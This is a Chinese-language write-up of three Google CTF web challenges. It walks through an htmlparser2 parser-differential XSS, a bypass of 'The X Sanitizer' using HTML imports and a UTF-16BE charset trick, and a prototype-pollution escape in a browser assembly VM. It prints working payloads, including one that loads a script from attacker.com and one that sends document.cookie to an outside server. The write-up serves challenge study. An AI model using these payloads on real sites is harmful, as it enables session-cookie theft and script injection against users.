Google CTF - Geokitties & X Sanitizer & JS 彙編

02-08

題目: Geokitties

address: https://geokitties-ovp7g3kbo79399z9-dot-ctf-web-kuqo48d.appspot.com/

題目代碼：

雖然 hint 上說這道題可以用特殊 Unicode 字元來繞過，但我想找個更簡便的方法。此處的輸入只會被過濾，而不會被轉碼。因此我們只需要找出題目用的 htmlparser2 和瀏覽器 HTML 解析器的差異性，再利用這一點執繞過防禦。打個比方，瀏覽器解析在閉合標籤中的屬性，而htmlparser2 卻不會這麼做，以下代碼

</z x="><i>">

會在htmlparser2 中創建一個<i>（</z x=">為無效代碼），但是瀏覽器卻不會生成標籤：

</z /x="><i x="><a href=https://attacker.com/attack.js onclick=documentElement.appendChild(createElement(script)).src=href>CLICK ME</a>"

在 htmlparser2 中,標籤允許以 _ 開頭。我們可以用它創建未閉合的屬性，這樣這個屬性就可以出現在 DOM 里：

<_ x="<a href=https://attacker.com/attack.js onclick=documentElement.appendChild(createElement(script)).src=href>CLICK ME</a>

當然，你也可以用如下腳本來 fuzz Uncode：

for (var i = 0; i < 0x10ffff; i++) { var c = String.fromCodePoint(i); var cl = c.toLowerCase(); if (!/[a-z]/i.test(c) && /[a-z]/.test(cl)) { console.log(c); }}

題目: The X Sanitizer

hint: 這個是我們用來測試HTML過濾器的頁面。我們用它移除payload。如果你能繞過它，我們就會給你flag。

總覽

這是一個 HTML 過濾器，它將index.html中的可疑輸入過濾掉：

<!DOCTYPE html> <html> <head> <title>The X Sanitizer</title> <meta http-equiv="Content-Security-Policy" content="default-src self"> <link rel="stylesheet" type="text/css" href="style.css"></link> <script src="main.js"></script> <script src="sanitizer.js"></script> </head> <body> [ ... ] <h2>Input HTML code</h2> <div id="input_form"> <textarea id="input"></textarea> <button id="render">Sanitize and render</button> <button id="submit">Submit solution</button> </div> <h2>Sanitized HTML</h2> <xmp id="output_text"></xmp> <h2>Rendered sanitized HTML</h2> <div id="output_render"></div> </body> </html>

注意，CSP 只允許我們載入同域的資源！我們再來看看 main.js，它負責監聽提交按鈕：

if (document.cookie.indexOf(flag=) === -1) document.cookie = flag=test_fl46; // For testingwindow.addEventListener("load", function() { // Main program logic var input = document.getElementById(input); var output_text = document.getElementById(output_text); var output_render = document.getElementById(output_render); var hash = location.hash.slice(1) || This is the <s>perfect</s><b>best</b> + <script>alert(document.domain);</script> + <i>HTML sanitizer</i>. + <script src="https://example.com"></script>; input.value = decodeURIComponent(hash); function render() { var html = input.value; location.hash = encodeURIComponent(html); sanitize(html, function (html){ output_render.innerHTML = html; output_text.textContent = html; }); } document.getElementById(render).addEventListener("click", render); render(); document.getElementById(submit).addEventListener("click", function() { location = /submit.html?html= + encodeURIComponent(input.value) });});

當我們點擊提交鍵時，監聽器會觸發 render()，再將 text box 內容作為參數傳遞給sanitize()，最後用 innerHTML 把過濾後的內容添加到一個 div 中。不過對我們來講，真正的重頭戲是 sanitizer.js。它包含了兩部分 —— 一半是 sanitize()的實現，另一半負責抓取鏈接內容：

// [[[ 1 ]]]function sanitize(html, callback) { if (!window.serviceWorkerReady) serviceWorkerReady = new Promise(function(resolve, reject) { if (navigator.serviceWorker.controller) return resolve(); navigator.serviceWorker.register(sanitizer.js) .then(reg => reg.installing.onstatechange = e => (e.target.state == activated) ? resolve() : 0); }); while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, ); // weird stuff... serviceWorkerReady.then(function() { var frame = document.createElement(iframe); frame.style.display = none; frame.src = /sandbox?html= + encodeURIComponent(html); document.body.appendChild(frame); addEventListener(message, function listener(msg) { if (msg.source != frame.contentWindow || msg.origin != location.origin) return; document.body.removeChild(frame); removeEventListener(message, listener); callback(msg.data); }); });}// [[[ 2 ]]]addEventListener(install, e => e.waitUntil(skipWaiting()));addEventListener(activate, e => e.waitUntil(clients.claim()));addEventListener(fetch, e => e.respondWith(clients.get(e.clientId).then(function(client) { var isSandbox = url => (new URL(url)).pathname === /sandbox; if (client && isSandbox(client.url)) { if (e.request.url === location.origin + /sanitize) { // [[[ 2 a ]]] return new Response(` onload = _=> setTimeout(_=> parent.postMessage(document.body.innerHTML, location.origin), 1000); remove = node => (node == document) ? document.body.innerHTML = : node.parentNode.removeChild(node); document.addEventListener("securitypolicyviolation", e => remove(e.target)); document.write(<meta http-equiv="Content-Security-Policy" content="default-src \none\; script-src *"><body>); `); } else { // [[[ 2 b ]]] // Violation events often dont point to the violating element, so we need this additional logic to track them down. // This is also important from marketing perspective. Do not remove or simplify this logic. return new Response(` with(document) remove(document === currentScript.ownerDocument ? currentScript : querySelector(link[rel="import"])); // <script src=x></script> `); } } else if (isSandbox(e.request.url)) { // [[[ 2 c ]]] return new Response( <!doctype HTML> <script src=sanitize> </script> <body> + decodeURIComponent(e.request.url.split(?html=)[1]), {headers: new Headers({X-XSS-Protection: 0, Content-Type: text/html})} ); } else { // [[[ 2 d ]]] return fetch(e.request); }})));

在[[[1]]]部分，sanitize()將該腳本註冊為 service worker。該 worker 負責替換 HTML 中的關鍵字，並創建一個 src 為/sandbox?html=XXX的 iframe。其中，XXX 是我們前面遞交的 HTML 代碼。當它從 iframe 接收到消息時，就會移除 iframe，並返回 iframe 里的 HTML。

[[[2]]]添加了一個名為 fetch()的監聽器來攔截請求。如果請求的是沙箱的 URL（也就是/sandbox?html=XXX），它就會返回一個簡單的 HTML 沙箱([[[2c]]]部分代碼)：

INPUT_HTML 是沙箱 URL 的參數(XXX)，該參數會被傳遞給 sanitize()過濾。最後，該腳本將 X-XSS-Protection 設置為0，這樣<script src=sanitize></script>就不會被 XSS Auditor 攔截。

過濾腳本是從/sanitize載入的（[[[2a]]]部分）。如果請求是從沙箱發來的，它就返回腳本。一秒後，這段代碼會通過 main.js，將沙箱中的 document.body.innerHTML 傳給父頁面。此外，它定義了 remove 函數來移除違反 CSP 的 DOM 元素。最後，它會添加一個新的CSP，該 CSP 只允許腳本外聯並移除內聯 JavaScript。

雖然沙箱內的 CSP 允許跨域載入資源，不過跨域請求和響應都會被[[[2b]]]所攔截並移除發出請求的<script>或者<link rel="import">

如果我們不在沙箱內，且發送的 URL 不為/sandbox，請求就可以順利通過。

Exploit

我們需要解決兩個問題：

讓一些 javascript 通過過濾器
繞過 CSP 政策。

繞過過濾器

如果我們違反了沙箱 CSP（不許內聯腳本），相應的 DOM 元素就會被移除：

remove = node => (node == document) ? document.body.innerHTML = : node.parentNode.removeChild(node);document.addEventListener("securitypolicyviolation", e => remove(e.target));

我們有兩個方法防止 CSP 被觸發：

通過<script src=//example.com></script>載入腳本。
通過<link rel="import">

HTML imports 也遵循 script-src 規則，因此<link rel="import" href="http://example.com/">不會違反沙箱的 CSP，但是<link rel="import">會被監聽器移除：

with(document) remove(document === currentScript.ownerDocument ? currentScript : querySelector(link[rel="import"]));

注意！querySelector()只匹配一個元素，我們只要加一個額外的<link rel="import">，就可以繞過過濾器：

通過這個 payload，我們就可以將如下 HTML 加到 DOM：

繞過 CSP

由於主頁面的 CSP 只能載入同源腳本，很顯然，我們此時唯一能利用的頁面是/sandobox?html=。然而它會在 js 代碼前添加 html 標籤，導致代碼不合法。我想，能不能通過更改javascript 的字符集來繞過了？如果我們把/sandbox?html=的輸出設置為 UTF-16BE，那麼解碼後的內容（這裡指先前插入的 html 標籤）對 javascript 解析器而言是合法的（但是未定義）。我們只要發送了編碼後的=0;alert(1)，瀏覽器就可以彈窗了！

不幸的是，UTF-16BE 是一個被過濾的關鍵字：

while (html.match(/meta|srcdoc|utf-16be/i)) html = html.replace(/meta|srcdoc|utf-16be/i, );

我們可以用 URL 編碼去繞過檢查。打個比方，以下的 payload 可以使頁面包含<meta>：

最終payload

我們將上述的<meta>替換為<script>，再在裡面設定 charset：

<link rel=import><link rel=import href="https://sanitizer.web.ctfcompetition.com/sandbox?html=<script charset=%22utf-16b%65%22%20src=/sandbox%3fhtml=PAYLOAD></script>">

我用了以下 payload：

=0;location.href=http://myserver/+document.cookie;

再編碼 payload：

%00=%000%00;%00l%00o%00c%00a%00t%00i%00o%00n%00.%00h%00r%00e%00f%00=%00%00h%00t%00t%00p%00:%00/%00/%00m%00y%00s%00e%00r%00v%00e%00r%00/%00%00+%00d%00o%00c%00u%00m%00e%00n%00t%00.%00c%00o%00o%00k%00i%00e%00;

就有了我們最終 payload。注意！我們需要對 payload 進行二次編碼，不然上述的 payload 會在第一次訪問 sandbox?html=URL 時就被解碼（一共要訪問兩次）：

<link rel=import><link rel=import href="https://sanitizer.web.ctfcompetition.com/sandbox?html=<script charset=%22utf-16b%65%22%20src=/sandbox%3fhtml=%2500=%25000%2500;%2500l%2500o%2500c%2500a%2500t%2500i%2500o%2500n%2500.%2500h%2500r%2500e%2500f%2500=%2500%2500h%2500t%2500t%2500p%2500:%2500/%2500/%2500m%2500y%2500s%2500e%2500r%2500v%2500e%2500r%2500/%2500%2500+%2500d%2500o%2500c%2500u%2500m%2500e%2500n%2500t%2500.%2500c%2500o%2500o%2500k%2500i%2500e%2500;></script>">

Chrome 生成的 HTML：

最終我們收到了 flag: CTF{no-problem-this-can-be-fixed-by-adding-a-single-if}

題目: Web 版彙編語言

我們利用彙編器的一個 bug（讀/寫 arrays 里的函數）重寫__proto__。再讓每個 work 執行相應代碼並返回 flag。

如果你想運行該程序，你可以在這裡下載：

index.html asm.js constants.js test.js vm.js worker.js

這些代碼實現了一個神奇的IDE，讓我們一起研究一下

簡述

原代碼都是被壓縮過的，我們可以在這裡美化代碼。後來，谷歌又給了一份沒有被壓縮過的代碼。為了方便閱讀，這篇 writeup 用的是谷歌給我們的代碼。

概括

這道題目大概是這麼一個流程：用戶寫完代碼後點擊編譯按鈕，程序就會發送許多組數據給我們的代碼執行。每套測試數據都有特定的輸入和與之對應的答案。我們的代碼必須通過 ret 返回正確的答案，不然則不能通過測試。

完成了所有的測試後，這個程序會問你要不要編譯並上傳代碼到伺服器中。伺服器又會運行一套相同的測試（也是在瀏覽器里），當程序的輸出和伺服器給定的答案一致時，伺服器返回結果給我們。

為了得到正確答案，我們要通過一個叫 flag 的測試，這個測試比較特別——伺服器不會給你任何的輸入，但又會判斷代碼的輸出。因此，我們不得不進行一些 hack。

基於 Web 的彙編語言

該語言可以分為兩個部分：數據和代碼

數據

數據遵循以下格式：

<data> ::= <variable_name> <type> <value><variable_name> ::= "$" <string><type> ::= "int" | "float" | "string" | "mem"<value> ::= <integer> | <string>

並且是被這樣編譯的：

switch (u) { case "string": parsedData = [8].concat(stringToInternal(f)); break; case "int": parsedData = [4].concat(intToInternal(f | 0)); break; case "float": parsedData = [7].concat(Array.from(new Uint8Array((new Float64Array([Number(f)])).buffer))); break; case "mem": for (currrentMemLength = 0; a < Number(requiredMemLength); currrentMemLength += 4) parsedData.push(0, 0, 127, 127); break; default: throw Error("Error parsing " + a);}

我們可以得知數據的第一個元素保存了它的類型，剩餘的元素表示了其它屬性。不過題目的解法和數據的存放方式不大不相干，我們不需要仔細研究這一部分。

彙編代碼

彙編代碼格式如下（因為解題時用不到 jump，我就沒把它加到裡面）：

<code> ::= <command> <to_variable> <aux_variable><to_variable> ::= <to_inline_variable> | <data_section_variable><to_inline_variable> ::= "int" | "float" <value><aux_variable> ::= <aux_inline_variable> | <data_section_variable><aux_inline_variable> ::= "int" | "float" | "string" <value><data_section_variable> ::= "$" <variable_name>

我們的彙編器有以下指令：mov cmp jlz jgz jnz jez ret add sub mul div mod and orr xor not shl shr prt get，每個指令接受兩個參數。就拿 mov 來說，它的第一個參數是偏移量（用來確定變數位置），第二個參數是你想賦予變數的值，比如：

.data$a int 1.codemov int 0 string abc

這個指令賦值 abc 給第一個變數

我們再看看這些代碼的定義：

String(code).replace(/^s*(([a-z]{3})s+(?:(int|float)?s*(S+))(?:s*(?:(int|float|string)?s*(.+))))/img, function(totalMatch, instruction, toType, toValue, auxType, auxValue) { else { parseData = function(variableType, variableValue, d) { switch (variableType) { case "int": compiledCode.push([4], (variableValue)); break; case "float": compiledCode.push([7], Array.from(new Uint8Array((new Float64Array([variableValue])).buffer))); break; case "string": compiledCode.push([8], p(variableValue)); break; default: compiledCode.push([(d ? 128 : 0) + 5], new Uint8Array(c.labels[variableValue].buffer)) // this occurs when no type was specified, thus we face a variable. The value will need to be derefenced before being used } }; var instructionOffset = predefinedInstructions.indexOf(instruction); compiledCode.push([instructionOffset]); parseData(toType, toValue, false); parseData(auxType, auxValue, true); }});

這個正則式禁止第一個類型為字元串，但我們可以這樣修改：

- /^s*(([a-z]{3})s+(?:(int|float)?s*(S+))(?:s*(?:(int|float|string)?s*(.+))))/img + /^s*(([a-z]{3})s+(?:(int|float|string)?s*(S+))(?:s*(?:(int|float|string)?s*(.+))))/img

我們現在可以在編譯時把字元串當作數組的索引了，比方說：mov string toString string abc，它實際上執行的是memory[toString] = abc。（譯者註：伺服器運行的是我們 編譯後 的代碼。而這個查發生在客戶端編譯檢查期間，因此伺服器可以執行上述指令）

字元串「解引用」

我們來看看處理命令參數的函數：

第一個位元組(bytes[0])保存了該數據的類型。該函數會通過這一位元組判斷傳進去參數的是否為指針。這個代碼並沒有對指針對應的數據類型進行檢查，那麼我們可以通過改變數據的高位元組（譯者註：編譯後的數據使用該位元組來表示數據類型）來加入一個新類型：字元串指針。當指針用[view [0]]解引用時，我們就可以訪問 memory 的屬性（比如__proto__，constructor）。

在後面的文章中，我將用術語 hui 指代字元串指針

另外一個值得注意的地方是 getValue：

function getValue(value, memory) { try { return getValue(value(memory), memory); } catch (e) { return value; }}

它遞歸執行 value，並檢查其是否為函數。雖然參數統一為 memory，但我們可以通過它調用所有能訪問的函數，

在 worker 中執行代碼

代碼被編譯後，會先在本地測試許多套數據。每套數據都在獨立的 worker 中執行，並用 postMessage 返回結果。worker 測試後的結果會和答案相比較，如果正確，則返回 flag 的字母。然而 worker 不會提供任何輸入，而且代碼是跑在伺服器上面，這也就是我們要在 worker里執行代碼的原因。

我們來總結一下目前做了什麼：

在 mov 中傳入字元串來改變 memory 的屬性
用 hui 來讀取 memory 的屬性
任意調用 memory 里的函數

先看看以下代碼：

/*1*/ memory.__proto__ = memory.pop; // 現在 __proto__ 是一個函數/*2*/ var f = memory.constructor; // 這時 constructor 就是 Function memory.__proto__ = orig_proto; // 恢復原來的 __proto__memory[0] = alert(1); // 要執行的代碼memory[1] = 1/*;memory[100500] = */;/*3*/ f(memory)(memory); // 調用 Function(memory), // 等同於 Function(memory.toString())

在/*1*/中，我們用某個函數替換掉了__proto__。在/*2*/調用 memory.constructor 時，則會得到一個 Function()，而不是 Array()。在/*3*/處，我們傳遞 memory 給函數執行。現在，memory.toString()如下：

alert(1),1/*blah,blah,blah,,,,,,,,*/

這個會導致彈窗

我們可以用如下的彙編代碼來複現 JS 版的彈窗

.data$code string alert(1)$comm string 1/*$proto string 1$constr string 1$res string 1.code&main:mov int 100500 string */mov $proto hui __proto__mov string __proto__ hui popmov $constr hui constructormov string __proto__ $protomov $res $constr

該代碼使用.data部分存儲，而不是memory[0]，memory[1]。不過實質都是一樣的。

用異常保持 worker 執行

現在來看看 worker 如何發送信息：

...function TestCaseError(data) { Error.call(this, this.message = Wrong answer on test + data.test);}TestCaseError.prototype = Error.prototype;... worker.onmessage = function(e) { if (e.data[answer] == test[1]) { resolve(e.data); } else { reject(new TestCaseError(e.data)); } worker.terminate(); };...

我們可以在 worker 中發送任意數據了，那麼能不能讓這個 onmessage 忽略錯誤數據，之返回正確數據呢?答案是發送不能換成字元串的數據類型（如data.test）。這樣，worker 只會拋出異常，但是不結束運行。

完整的方案

把上面的方法組合起來，就可以這麼做：

用 hui 類型編譯代碼，這樣就可以在 worker 里執行代碼並測試正確的字元
在 worker 中，用以下的代碼來暴力破解 flag 字元:postMessage({"answer":flag_character_guess, "test": {"toString":0}})
因為拋出異常的緣故，不正確的結果會被 onmessage 忽略掉，正確的則會被返回
通過所有測試後，我們就能拿到 flag 了！

最終的答案是：C,T,F,{,_,r,3,m,0,v,3,_,t,h,3,_,c,0,m,m,4,s,_,p,l,z,_,k,t,h,x,b,y,e,_,}